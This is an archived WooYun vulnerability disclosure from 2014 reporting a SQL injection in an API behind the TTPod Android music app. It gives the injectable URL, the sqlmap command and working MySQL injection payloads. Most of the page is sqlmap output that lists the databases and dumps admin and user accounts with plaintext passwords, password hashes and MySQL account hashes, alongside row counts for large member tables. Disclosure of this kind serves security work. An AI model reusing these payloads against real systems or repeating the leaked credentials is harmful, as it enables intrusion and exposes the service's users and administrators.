乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-24: 细节已通知厂商并且等待厂商处理中 2014-06-25: 厂商已经确认,细节仅向厂商公开 2014-07-05: 细节向核心白帽子及相关领域专家公开 2014-07-15: 细节向普通白帽子公开 2014-07-25: 细节向实习白帽子公开 2014-08-08: 细节向公众公开
root权限啊。。。尼玛,我没脱,你们信麽?-。-
发现来源安卓客户端天天动听最新版
注入点:http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016
GET参数f存在注入通知存在注入点,未做进一步测试!
sqlmap.py -u 'http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016' -p "f" --batchsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: f Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: f=f384' RLIKE (SELECT (CASE WHEN (5571=5571) THEN 0x66333834 ELSE 0x28 END)) AND 'snjQ'='snjQ&v=v6.5.0.2013123016 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML) Payload: f=f384' AND UPDATEXML(3360,CONCAT(0x2e,0x716e6b6171,(SELECT (CASE WHEN (3360=3360) THEN 1 ELSE 0 END)),0x716e616d71),6423) AND 'tnpf'='tnpf&v=v6.5.0.2013123016 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: f=f384' UNION ALL SELECT CONCAT(0x716e6b6171,0x4e506c54656853686e61,0x716e616d71)#&v=v6.5.0.2013123016 Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: f=-8917' OR 5490=SLEEP(5) AND 'FWhc'='FWhc&v=v6.5.0.2013123016---back-end DBMS: MySQL 5.1available databases [22]: [*] db_12530[*] db_atj[*] db_ayyc[*] db_browsernav[*] db_ddfg[*] db_draw_busdh_com[*] db_ios_skin[*] db_market[*] db_new_ttpod[*] db_skin[*] db_ttpod_discuz[*] db_ttpod_ucenter[*] db_update[*] draw_busdh_com[*] earphone[*] entnews[*] information_schema[*] mysql[*] performance_schema[*] skin[*] ttpod[*] yuledbhttp://draw.busdh.com/Database: db_draw_busdh_comTable: userinfo[15 entries]+-------------+--------------------+----------+---------------------+--------------+| id | email | userName | createTime | userPassword |+-------------+--------------------+----------+---------------------+--------------+| 00000000426 | [email protected] | admin | 2013-10-31 14:02:11 | admin || 00000000427 | [email protected] | ttpod | 2013-10-31 14:06:33 | ttpod*()98 || 00000000428 | [email protected] | view | 2013-10-31 15:11:39 | view |+-------------+--------------------+----------+---------------------+--------------+http://fm.admin.ttpod.com/http://admin.lrc.ttpod.com/auth/loginDatabase: ttpodTable: admin[10 entries]+----+-------+------+----------------------------------+---------------------+| id | name | flag | password | create_time |+----+-------+------+----------------------------------+---------------------+| 1 | ttpod | 0 | 5bb50d44821fffd63299af3025234087 | 2012-01-18 00:00:00 || 20 | baidu | 0 | dbf2074a06e4d98e7a291a38270af7b9 | 2013-01-31 08:39:39 |+----+-------+------+----------------------------------+---------------------+Database: db_new_ttpodTable: users[30 entries]+----+----------------+---------------+----------------------------------------------------------------------------------------------+| id | email | username | password |+----+----------------+---------------+----------------------------------------------------------------------------------------------+| 1 | [email protected] | clong | 1100 || 2 | [email protected] | user1 | $shiro1$SHA-256$500000$Cz8CvbpUrpgkk+k8puy3iA==$VRXptpQeeCwzYDTq+ZEr8rrTFFUIIan/Xk5jwHXFRYg= || 3 | [email protected] | admin | jianguo*()98 || 4 | [email protected] | user2 | $shiro1$SHA-256$500000$l48hH1mNJTZC35z6YPyj0w==$FyrwtiltMAdv7bwghfmGzqReJFliYcocbgiZkSaavMU= || 5 | <blank> | tcode_manager | ttpodt1n50 || 6 | <blank> | tcode_user | ttpod123 |+----+----------------+---------------+----------------------------------------------------------------------------------------------+database management system users [10]: [*] 'db_bbs'@'10.0.2.%'[*] 'db_browsernav'@'%'[*] 'db_skin'@'%'[*] 'db_skin'@'10.0.2.%'[*] 'draw_busdh_com'@'10.0.2.%'[*] 'earphone'@'%'[*] 'link'@'%'[*] 'root'@'localhost'[*] 'slave'@'%'[*] 'webis'@'%'database management system users password hashes:[*] db_bbs [1]: password hash: *730A86BC4C3F693A6862F939E48BEBB75D786189[*] db_browsernav [1]: password hash: *01D060A476642BA8335B832AC5B211F222F641B5[*] earphone [1]: password hash: *01D060A476642BA8335B832AC5B211F222F641B5[*] link [1]: password hash: *01D060A476642BA8335B832AC5B211F222F641B5[*] root [1]: password hash: *01D060A476642BA8335B832AC5B211F222F641B5[*] webis [1]: password hash: *01D060A476642BA8335B832AC5B211F222F641B5 Database: db_ttpod_ucenter +---------------------+---------+| Table | Entries |+---------------------+---------+| uc_members | 594367 || uc_memberfields | 594365 || uc_newpm | 421201 || uc_pms | 4622 || uc_friends | 4276 || uc_pm_members | 2400 || uc_pm_indexes | 2059 || uc_pm_lists | 1237 || uc_notelist | 516 || uc_pm_messages_2 | 223 || uc_pm_messages_3 | 221 || uc_pm_messages_8 | 221 || uc_pm_messages_7 | 216 || uc_pm_messages_9 | 208 || uc_pm_messages_5 | 200 || uc_pm_messages_1 | 199 || uc_pm_messages_0 | 198 || uc_pm_messages_6 | 188 || uc_pm_messages_4 | 185 || uc_settings | 28 || uc_vars | 3 || uc_admins | 1 || uc_applications | 1 || uc_failedlogins | 1 || uc_protectedmembers | 1 |+---------------------+---------+[00:46:28] [INFO] the SQL query used returns 404 entriesDatabase: db_ttpod_discuz +---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| pre_forum_post | 847629 || cdb_posts | 727193 || pre_common_member_log | 501857 || cdb_members | 501856 || cdb_memberfields | 501844 || pre_common_member_count_archive | 467197 || pre_common_member_field_forum_archive | 467197 || pre_common_member_profile_archive | 467197 || pre_common_member_status_archive | 467197 || pre_common_member_field_home_archive | 467196 || pre_common_member_archive | 467189 || pre_common_onlinetime | 294138 || pre_home_notification | 208959 || cdb_onlinetime | 204705 || pre_common_credit_rule_log | 166058 || pre_forum_attachment | 165258 || pre_forum_thread | 153779 || cdb_attachments | 124347 || pre_common_member | 110564 || pre_common_member_status | 110563 || pre_common_member_count | 110562 || pre_common_member_field_forum | 110561 || pre_common_member_field_home | 110561 || pre_common_member_profile | 110561 || pre_forum_threadaddviews | 105521 || pre_common_credit_log | 98319 || cdb_threads | 90232 || pre_security_evilpost | 86098 || cdb_spacecaches | 85234 || pre_common_member_newprompt | 72957 || pre_plugin_user_defender_badpwd | 66821 || pre_forum_threadmod | 60158 || pre_forum_ratelog | 59086 || cdb_ratelog | 57426 || pre_forum_threadpartake | 51160 || cdb_attachpaymentlog | 45503 || pre_common_district | 45052 || pre_forum_statlog | 37616 || pre_forum_pollvoter | 32688 || cdb_memberspaces | 30319 || pre_forum_filter_post | 23690 || pre_common_connect_guest | 22800 || cdb_threadsmod | 21460 || pre_connect_memberbindlog | 21201 || pre_common_member_connect | 19835 || pre_common_admincp_cmenu | 18913 || cdb_admincustom | 18903 || pre_forum_attachment_2 | 17757 || pre_forum_attachment_3 | 17259 || pre_forum_attachment_6 | 16682 || pre_forum_attachment_1 | 16646 || pre_forum_attachment_9 | 16357 || pre_forum_attachment_0 | 16104 || pre_forum_attachment_4 | 15775 || pre_forum_attachment_7 | 15662 || pre_forum_attachment_5 | 15462 || pre_forum_attachment_8 | 15196 || pre_home_friend_request | 13045 || pre_forum_modwork | 10522 || pre_connect_feedlog | 10034 || pre_security_eviluser | 9110 || pre_home_favorite | 8838 || cdb_myposts | 8810 || pre_forum_attachment_exif | 8667 || pre_forum_sofa | 8462 || cdb_favorites | 8394 || pre_discuz_security_banip | 8126 || pre_forum_thread_censor | 8106 || cdb_pms | 7829 || pre_common_word | 7497 || pre_forum_postcache | 7136 || cdb_modworks | 5622 || pre_connect_postfeedlog | 5457 || cdb_mythreads | 4832 || pre_connect_tthreadlog | 4735 || pre_common_remote_port | 4272 || pre_common_member_crime | 4201 || pre_forum_threadimage | 2599 || pre_common_magiclog | 2588 || cdb_magiclog | 2369 || pre_forum_medallog | 2369 || cdb_medallog | 2120 || pre_common_credit_rule_log_field | 2004 || pre_common_member_grouppm | 1599 || pre_forum_attachment_unused | 1449 || pre_common_credit_log_field | 1438 || cdb_paymentlog | 1425 || pre_forum_polloption | 1273 || cdb_polloptions | 1136 || pre_common_tagitem | 1116 || pre_common_member_medal | 1095 || pre_forum_postcomment | 1091 || pre_forum_newthread | 927 || pre_forum_threaddisablepos | 884 || pre_home_pic | 826 || pre_common_failedip | 825 || pre_home_friend | 762 || pre_common_member_action_log | 747 || pre_common_stat | 698 || pre_plugin_banklog | 678 || cdb_rsscaches | 638 || pre_forum_threadclass | 552 || pre_forum_post_tableid | 513 || pre_common_smiley | 501 || cdb_smilies | 472 || pre_common_setting | 465 || cdb_buddys | 462 || cdb_regips | 452 || pre_home_friendlog | 389 || cdb_stylevars | 360 || pre_discuz_security_manager_action | 357 || pre_forum_warning | 338 || pre_common_session | 336 || pre_discuz_security_forum | 327 || pre_common_statuser | 306 || pre_common_tag | 301 || cdb_warnings | 281 || pre_common_block_item | 254 || pre_home_comment | 250 || cdb_settings | 238 || pre_common_syscache | 229 || pre_forum_threadhot | 216 || pre_forum_poll | 190 || pre_home_pokearchive | 188 || cdb_words | 187 || pre_common_regip | 176 || cdb_polls | 169 || pre_home_feed | 167 || pre_forum_post_location | 161 || pre_forum_threadcalendar | 158 || pre_plugin_bankoperation | 155 || cdb_banned | 141 || pre_home_poke | 137 || pre_common_stylevar | 135 || cdb_statvars | 130 || pre_common_member_magic | 125 || pre_forum_rsscache | 115 || pre_common_block_pic | 108 || pre_baidusubmit_sitemap | 106 || pre_plugin_user_defender_stat | 105 || pre_common_block_style | 103 || cdb_membermagics | 102 || pre_home_follow | 98 || pre_home_visitor | 94 || pre_forum_hotreply_member | 93 || cdb_moderators | 90 || pre_common_searchindex | 90 || pre_forum_hotreply_number | 90 || pre_forum_moderator | 83 || pre_common_admincp_perm | 77 || cdb_threadtypes | 73 || pre_common_report | 72 || pre_forum_forum | 69 || pre_forum_forumfield | 69 || cdb_medals | 67 || pre_forum_medal | 67 || pre_forum_spacecache | 67 || cdb_forumlinks | 65 || cdb_typeoptions | 65 || pre_forum_typeoption | 65 || pre_common_pluginvar | 61 || pre_common_nav | 59 || cdb_forumfields | 58 || cdb_forums | 58 || pre_common_devicetoken | 54 || cdb_rewardlog | 52 || cdb_reportlog | 51 || pre_common_member_profile_setting | 51 || cdb_stats | 50 || pre_pig_member | 50 || pre_common_block | 49 || pre_common_cache | 49 || cdb_caches | 42 || cdb_subscriptions | 41 || pre_forum_attachtype | 41 || pre_common_member_verify | 39 || pre_common_member_secwhite | 38 || pre_common_optimizer | 36 || pre_common_template_block | 35 || pre_common_usergroup_field | 35 || cdb_attachtypes | 34 || cdb_faqs | 34 || cdb_usergroups | 33 || pre_forum_thread_moderate | 33 || pre_home_album | 33 || pre_common_credit_rule | 32 || cdb_promotions | 31 || pre_common_usergroup | 31 || pre_home_blog | 27 || pre_home_blogfield | 27 || pre_common_magic | 25 || pre_common_friendlink | 22 || pre_common_plugin | 22 || cdb_threadtags | 21 || pre_common_cron | 20 || cdb_tags | 19 || pre_common_banned | 18 || pre_plugin_user_defender | 18 || cdb_failedlogins | 17 || cdb_searchindex | 15 || pre_forum_poststick | 15 || pre_home_click | 15 || cdb_crons | 13 || pre_common_grouppm | 13 || pre_common_myapp | 13 || cdb_magics | 12 || cdb_projects | 12 || pre_common_failedlogin | 12 || pre_forum_bbcode | 11 || pre_home_doing | 11 || pre_common_admincp_member | 10 || pre_security_member | 10 || cdb_bbcodes | 9 || cdb_ranks | 9 || cdb_styles | 9 || pre_baidusubmit_setting | 9 || pre_common_secquestion | 9 || pre_baidusubmit_urlstat | 8 || pre_forum_polloption_image | 8 || pre_forum_post_moderate | 8 || cdb_templates | 7 || cdb_magicmarket | 6 || cdb_request | 6 || pre_common_diy_data | 6 || pre_forum_onlinelist | 6 || pre_home_show | 6 || cdb_announcements | 5 || pre_common_admincp_group | 5 || pre_common_admingroup | 5 || pre_common_advertisement | 5 || pre_common_member_verify_info | 5 || cdb_admingroups | 4 || cdb_creditslog | 4 || cdb_imagetypes | 4 || cdb_onlinelist | 4 || cdb_typemodels | 4 || pre_common_process | 4 || pre_discuz_security_adminlog | 4 || pre_forum_access | 4 || pre_forum_imagetype | 4 || pre_forum_threadclosed | 4 || pre_plugin_user_defender_failedlogin | 4 || pre_common_word_type | 3 || pre_forum_grouplevel | 3 || pre_forum_replycredit | 3 || pre_home_class | 3 || cdb_access | 2 || cdb_advertisements | 2 || pre_common_admincp_session | 2 || pre_common_patch | 2 || pre_common_style | 2 || pre_common_template | 2 || pre_forum_promotion | 2 || pre_mobile_setting | 2 || pre_plugin_banklist | 2 || pre_tools_rule | 2 || pre_yy_killreg | 2 || cdb_adminactions | 1 || cdb_adminsessions | 1 || cdb_itempool | 1 || cdb_pmsearchindex | 1 || cdb_profilefields | 1 || pre_common_addon | 1 || pre_common_uin_black | 1 || pre_forum_announcement | 1 || pre_forum_threadprofile | 1 || pre_forum_trade | 1 || pre_hdx_player_activity | 1 || pre_home_picfield | 1 || pre_home_share | 1 |+---------------------------------------+---------+Database: ttpodTable: admin[10 entries]+----+-------+------+----------------------------------+---------------------+| id | name | flag | password | create_time |+----+-------+------+----------------------------------+---------------------+| 1 | ttpod | 0 | 5bb50d44821fffd63299af3025234087 | 2012-01-18 00:00:00 || 20 | baidu | 0 | dbf2074a06e4d98e7a291a38270af7b9 | 2013-01-31 08:39:39 |+----+-------+------+----------------------------------+---------------------+Database: db_new_ttpodTable: users[30 entries]+----+----------------+---------------+----------------------------------------------------------------------------------------------+| id | email | username | password |+----+----------------+---------------+----------------------------------------------------------------------------------------------+| 1 | [email protected] | clong | 1100 || 2 | [email protected] | user1 | $shiro1$SHA-256$500000$Cz8CvbpUrpgkk+k8puy3iA==$VRXptpQeeCwzYDTq+ZEr8rrTFFUIIan/Xk5jwHXFRYg= || 3 | [email protected] | admin | jianguo*()98 || 4 | [email protected] | user2 | $shiro1$SHA-256$500000$l48hH1mNJTZC35z6YPyj0w==$FyrwtiltMAdv7bwghfmGzqReJFliYcocbgiZkSaavMU= || 5 | <blank> | tcode_manager | ttpodt1n50 || 6 | <blank> | tcode_user | ttpod123 |+----+----------------+---------------+----------------------------------------------------------------------------------------------+
有效过滤。上边贴出的一些隐私信息和相关密码,建议更改下!
危害等级:高
漏洞Rank:10
确认时间:2014-06-25 10:01
谢谢
暂无